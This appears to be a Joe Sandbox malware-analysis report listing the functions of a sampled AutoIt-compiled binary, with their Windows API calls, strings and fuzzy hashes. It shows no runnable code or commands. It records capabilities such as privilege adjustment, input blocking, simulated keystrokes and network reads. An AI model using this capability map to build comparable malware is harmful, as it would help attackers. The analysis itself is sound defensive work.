Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 550cc927a4d1f15f51c232ed7b6e2aca86ac47d5e787587ee04f91ea7281e674
Instruction ID: 17a70154932cff185f3c15faca02f3e308f1202dbfc48954a0ebe5076c52d0c3
Opcode Fuzzy Hash: 550cc927a4d1f15f51c232ed7b6e2aca86ac47d5e787587ee04f91ea7281e674
Instruction Fuzzy Hash: A41100B2A00208FFDB509F64CC48BAE7BB9FF41365F10C01AE94A93121C3759900EB61

Function 00F8A570 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00F1B329: _wcslen.LIBCMT ref: 00F1B333

FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00F8A5BD
FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00F8A6D0

Part of subcall function 00F842B9: GetInputState.USER32 ref: 00F84310
Part of subcall function 00F842B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F843AB

Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00F8A5ED
FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00F8A6BA

Strings

*.*, xrefs: 00F8A5A2

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
String ID: *.*
API String ID: 1972594611-438819550
Opcode ID: 2efbba9facb39b587375472a81171167a602e46777f0b9b91f71d731c0847892
Instruction ID: 289619005d890529ae6a90e9abf5818faf9e86cc4568f6b394b3f4566ea2987c
Opcode Fuzzy Hash: 2efbba9facb39b587375472a81171167a602e46777f0b9b91f71d731c0847892
Instruction Fuzzy Hash: 2B41417190020AEFDF15EFA4CC49AEEBBB4FF05320F144056E815A61A1EB359E85EF61

Function 00F122AD Relevance: 7.8, APIs: 5, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 00F1233E
GetSysColor.USER32(0000000F), ref: 00F12421
SetBkColor.GDI32(?,00000000), ref: 00F12434

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Color$Proc
String ID:
API String ID: 929743424-0
Opcode ID: 6037cb3b02ebf5c81d2516e47b07c89ef070b968c528819a9f42b25ed626d21f
Instruction ID: 8921729d187dcdaeb9b8ee901f33933cdd52e58ee564d4414ab97ac949a4aef9
Opcode Fuzzy Hash: 6037cb3b02ebf5c81d2516e47b07c89ef070b968c528819a9f42b25ed626d21f
Instruction Fuzzy Hash: 8D8168F2908408BEE26C66BC4C88FFF355DDB47361F150119F612C6596D95D8FA2B232

Function 00F92263 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00F93AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F93AD7
Part of subcall function 00F93AAB: _wcslen.LIBCMT ref: 00F93AF8

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F922BA
WSAGetLastError.WSOCK32 ref: 00F922E1
bind.WSOCK32(00000000,?,00000010), ref: 00F92338
WSAGetLastError.WSOCK32 ref: 00F92343
closesocket.WSOCK32(00000000), ref: 00F92372

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
String ID:
API String ID: 1601658205-0
Opcode ID: 490daa4125780c267d12a6d3c6abc8429c39ce4633ece0a3edad95206511bd30
Instruction ID: 9391a049af28037cead5ab7d218425482f7ebcc712b2103b0d5761105694fea5
Opcode Fuzzy Hash: 490daa4125780c267d12a6d3c6abc8429c39ce4633ece0a3edad95206511bd30
Instruction Fuzzy Hash: 2C51D675A40210AFEB10EF24D886F6A77E5AB45764F448048F9455F3C3C778AD42DBE1

Function 00FA26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00FA275C
IsWindowEnabled.USER32 ref: 00FA276A
GetForegroundWindow.USER32(?,?,00000001,?), ref: 00FA2777
IsIconic.USER32 ref: 00FA2785
IsZoomed.USER32 ref: 00FA2793

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: c95087ccea035721bcedbdda75a53d480df0a21fa2513f4c674d75443a0de7f8
Instruction ID: d6bbe3b5cfd037f54d0452c9471b7ea584a4d29b1229112f50ba7d59bb577b5b
Opcode Fuzzy Hash: c95087ccea035721bcedbdda75a53d480df0a21fa2513f4c674d75443a0de7f8
Instruction Fuzzy Hash: 4C2108B5B002158FD7509F2EC844B5A7BE5FF86324F58806CE84A8B351CB75EE42EB90

Function 00F8D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 00F8D8CE
GetLastError.KERNEL32(?,00000000), ref: 00F8D92F
SetEvent.KERNEL32(?,?,00000000), ref: 00F8D943

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: 5de9b76879b16f612fe5a1a0c7eb54f0349d391218811a4d5fb70df6bb2117cb
Instruction ID: c9815ec0dccc052e2dbf2f0da3198ec00aa1a822f4b0d6767203f85fe8e8e381
Opcode Fuzzy Hash: 5de9b76879b16f612fe5a1a0c7eb54f0349d391218811a4d5fb70df6bb2117cb
Instruction Fuzzy Hash: 6621AFB1900705EFEB20AF65DC84BAAB7FCEF41324F10441EE646A2191E774EE05EB50

Function 00F7E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00F546AC), ref: 00F7E482
GetFileAttributesW.KERNEL32(?), ref: 00F7E491
FindFirstFileW.KERNEL32(?,?), ref: 00F7E4A2
FindClose.KERNEL32(00000000), ref: 00F7E4AE

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: ae484f07053bae508bb8ee5792c0fe883056521d5ebbdc0f1face1e7abd45836
Instruction ID: 9a933b8a77a838b8c0a097fffc660db80838e6738fe510f68ba490a3af7faad4
Opcode Fuzzy Hash: ae484f07053bae508bb8ee5792c0fe883056521d5ebbdc0f1face1e7abd45836
Instruction Fuzzy Hash: EAF0E57181091457D211AB3CEC0D8AB77ADAE07335B508783F83BC24F0D7789D95B696

Function 00F6E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00F6E5F8

Strings

%.3d, xrefs: 00F6E603
X64, xrefs: 00F6E680

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 270fca82a4261646f01e8b60a194bbcd6b8e4b4bcc2bc3ffce89b4fed4b85706
Instruction ID: a355f0cc6300ca99bd78f0d72b2d08037d18f086ef01118e48d6035d5bffbc06
Opcode Fuzzy Hash: 270fca82a4261646f01e8b60a194bbcd6b8e4b4bcc2bc3ffce89b4fed4b85706
Instruction Fuzzy Hash: D7D012BBC1411CE6CB80DA90DC48EB9737CAB19300F248462F90691000E6259908BB22

Function 00F42992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00F42A8A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00F42A94
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00F42AA1

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 3d5e90ee2cb38eff00ce3ea0ac1a2bc6de5344f8edcc2a67bef8264011940681
Instruction ID: 1636e6c0ff0909d1a33bf9f89017c95a547e4f1f1e585a0d7f851c1f47da8717
Opcode Fuzzy Hash: 3d5e90ee2cb38eff00ce3ea0ac1a2bc6de5344f8edcc2a67bef8264011940681
Instruction Fuzzy Hash: 9631D57590122C9BCB61DF68DD897DCBBB8AF08310F5041EAE80CA6260EB349F85DF45

Function 00F72010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00F3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F309D8
Part of subcall function 00F3014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00F309F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F7205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F72087
GetLastError.KERNEL32 ref: 00F72097

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 47d59e8946add294e5d7d44335627b75ce44c5b7f3f6890d64e6699ed07f5f36
Instruction ID: f404780cbf040e7c2599fd976de7bd17f97bf724474d83071f5e8a201dd76597
Opcode Fuzzy Hash: 47d59e8946add294e5d7d44335627b75ce44c5b7f3f6890d64e6699ed07f5f36
Instruction Fuzzy Hash: 8C11C1B2400304AFD718AF64DCC6E6BB7B8EB05720F20C41EF04A53251DB70BC41DA20

Function 00F35058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00F3502E,?,00FD98D8,0000000C,00F35185,?,00000002,00000000), ref: 00F35079
TerminateProcess.KERNEL32(00000000,?,00F3502E,?,00FD98D8,0000000C,00F35185,?,00000002,00000000), ref: 00F35080
ExitProcess.KERNEL32 ref: 00F35092

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 398ebdb34fe4161f80e7af2c44374895a8bca75fb77ad15b1c84f9a0031fe272
Instruction ID: 0a5fc3a015aff9c2403d1d9f890b00034b4ad799bfb22fa360a14b13d2cc1c8d
Opcode Fuzzy Hash: 398ebdb34fe4161f80e7af2c44374895a8bca75fb77ad15b1c84f9a0031fe272
Instruction Fuzzy Hash: 73E0B6B140064CAFCF256F54DD09E583B6AEB917A5F114014F84A9A521DB3AED42EAD0

Function 00F7ECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00F7ED04

Strings

DOWN, xrefs: 00F7ECE9

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 5bd65c85fdb3fa90b0c1d3be93f18563baef30f01b450884e258277d646d0af0
Instruction ID: e1a058213e6d58d39d081acba613e1a0b3cce21e9a400a0ba0e425247391d127
Opcode Fuzzy Hash: 5bd65c85fdb3fa90b0c1d3be93f18563baef30f01b450884e258277d646d0af0
Instruction Fuzzy Hash: B8E086665AD7257CB90421187C06EF6134C8F16734B1541D7F804E41C0ED546C4270A7

Function 00F6E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00F6E664

Strings

X64, xrefs: 00F6E680

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: a57a12cc5a7a8263cf18b4d430fad6e4557aad3ca6ed705f3e607d1432682cf2
Instruction ID: 2d5640425986805fadb019be4bcdef5026cb51cdb61fe40a5e21b025a192ffae
Opcode Fuzzy Hash: a57a12cc5a7a8263cf18b4d430fad6e4557aad3ca6ed705f3e607d1432682cf2
Instruction Fuzzy Hash: 4AD0C9FA81112DEACB80CB90EC88EDA737CBB05304F104651F106A2000D7309548AB20

Function 00F841FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00F952EE,?,?,00000035,?), ref: 00F84229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00F952EE,?,?,00000035,?), ref: 00F84239

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 21132ed1cab95b1b1e5394a2c9d1010b935e12eef5f1bd634a1df5c69376dd49
Instruction ID: 9cfcbc4f64edb15fac18cae9cfaa30b0b107627ee1a115bd74fe93b8c3350058
Opcode Fuzzy Hash: 21132ed1cab95b1b1e5394a2c9d1010b935e12eef5f1bd634a1df5c69376dd49
Instruction Fuzzy Hash: 85F0E5716043296AEB2026659C4DFEB366DEFC6761F0002B9F509D2191D970A940E7B1

Function 00F7BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00F7BC24
keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00F7BC37

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 616847c5f5dfaf380c123fe15abf737823ac77c5b47d76278dc45e581e6df200
Instruction ID: df47e2df3de7d0fe7333a7ed5d07c7f6b833206f0c6a432432256dbcb3b10e8d
Opcode Fuzzy Hash: 616847c5f5dfaf380c123fe15abf737823ac77c5b47d76278dc45e581e6df200
Instruction Fuzzy Hash: D8F06D7180024DABDB059FA0C805BFE7BB4FF09309F04C00AF955A6191C7798601EF95

Function 00F71A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F71B48), ref: 00F71A20
CloseHandle.KERNEL32(?,?,00F71B48), ref: 00F71A35

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: ad9d09b58a8027d8a06beebe05172ca0f860ba4cda9deb22128664cd09012277
Instruction ID: fccdf51988e3f1fa85cd868a9e1dfd344e671b9aa90a4806a3c0d763837243dd
Opcode Fuzzy Hash: ad9d09b58a8027d8a06beebe05172ca0f860ba4cda9deb22128664cd09012277
Instruction Fuzzy Hash: D8E0BF72014614AFF7252B14FC05F7777A9FB04321F14891EF59680870DB666C91FB50

Function 00F8F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00F8F51A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 4aec4330daf7ed8b9eaa41fbafa6c6e250e9df9172c2a1101311c3d769fc7934
Instruction ID: 2b4931c6a7c0f5c54482c22da4069c158c2b76a58fd1fe02c2611811a09a5618
Opcode Fuzzy Hash: 4aec4330daf7ed8b9eaa41fbafa6c6e250e9df9172c2a1101311c3d769fc7934
Instruction Fuzzy Hash: 86E048326102045FC710AF69D804AD6F7D8AFA4761F048425FC4ACB351DA74F9849B91

Function 00F30D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,00F3075E), ref: 00F30D4A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 027669b0ad04fa13c0fcac0bc53edcdd9315cc88a6d38035c1b1c2c28ee7ad64
Instruction ID: 56a350b73e4458810801e29d224f509423e47fe1075cc20638500a890754f4e6
Opcode Fuzzy Hash: 027669b0ad04fa13c0fcac0bc53edcdd9315cc88a6d38035c1b1c2c28ee7ad64
Instruction Fuzzy Hash:

Function 00F9353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00F9358D
DeleteObject.GDI32(00000000), ref: 00F935A0
DestroyWindow.USER32 ref: 00F935AF
GetDesktopWindow.USER32 ref: 00F935CA
GetWindowRect.USER32(00000000), ref: 00F935D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00F93700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00F9370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F93755
GetClientRect.USER32(00000000,?), ref: 00F93761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F9379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F937BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F937D2
